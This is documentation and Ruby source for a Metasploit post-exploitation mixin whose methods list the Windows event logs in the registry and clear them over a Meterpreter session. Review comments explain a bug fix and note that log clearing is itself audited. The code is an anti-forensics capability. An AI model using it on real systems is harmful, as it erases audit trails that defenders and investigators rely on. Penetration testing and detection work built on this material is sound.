Module: Msf::Post::Windows::Eventlog

Defined in:
lib/msf/core/post/windows/eventlog.rb


Instance Method Details

#eventlog_clear(evt = "") ⇒ Object

Clears a given eventlog, or all eventlogs if none is given. Returns an array of the eventlogs that were cleared.



# File 'lib/msf/core/post/windows/eventlog.rb', line 42

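# Clears a given eventlog, or every eventlog returned by #eventlog_list when
# none is given.
#
# Fix: the original called +eventloglist+, which is not defined in this
# module; the enumerator is +eventlog_list+, so the no-argument form raised
# NameError instead of clearing anything.
#
# @param evt [String] name of the eventlog to clear; empty means all logs
# @return [Array<String>] names of the eventlogs that were cleared
def eventlog_clear(evt = "")
  # Array() turns a nil result from the enumerator into an empty list, so the
  # caller gets [] back instead of a NoMethodError on #each.
  targets = evt.empty? ? Array(eventlog_list) : [evt]
  targets.each do |name|
    log = session.sys.eventlog.open(name)
    # Clearing a log is itself audited by Windows (e.g. Security event 1102
    # records that the Security log was cleared), so this action is visible
    # to defenders and should be expected to surface in detection.
    log.clear
    # NOTE(review): the handle opened above is never released; if the stdapi
    # EventLog object exposes a close method, calling it after clear would
    # avoid leaking handles on the target — confirm.
  end
  targets
end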

#eventlog_list ⇒ Object

Enumerate eventlogs



# File 'lib/msf/core/post/windows/eventlog.rb', line 27

# Enumerates the eventlogs registered under the Services\eventlog key.
#
# @return [Array<String>, nil] whatever registry_enumkeys returns for the key
def eventlog_list
  base = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\"
  os_name = session.sys.config.sysinfo['OS']
  # Older Windows releases are recognised by OS string to pick the key spelling.
  # NOTE(review): registry key names are case-insensitive on Windows, so this
  # branch most likely only changes the spelling of the path — confirm.
  subkey = os_name =~ /Windows 2003|\.Net|XP|2000/ ? 'Eventlog' : 'eventlog'
  registry_enumkeys("#{base}#{subkey}")
end

#initialize(info = {}) ⇒ Object



# File 'lib/msf/core/post/windows/eventlog.rb', line 8

# Declares the Meterpreter commands this mixin uses (sysinfo plus the
# stdapi eventlog family) in the module's 'Compat' info before handing the
# merged info hash to the superclass.
#
# @param info [Hash] module info hash to extend
def initialize(info = {})
  compat = {
    'Compat' => {
      'Meterpreter' => {
        'Commands' => %w[stdapi_sys_config_sysinfo stdapi_sys_eventlog_*]
      }
    }
  }
  super(update_info(info, compat))
end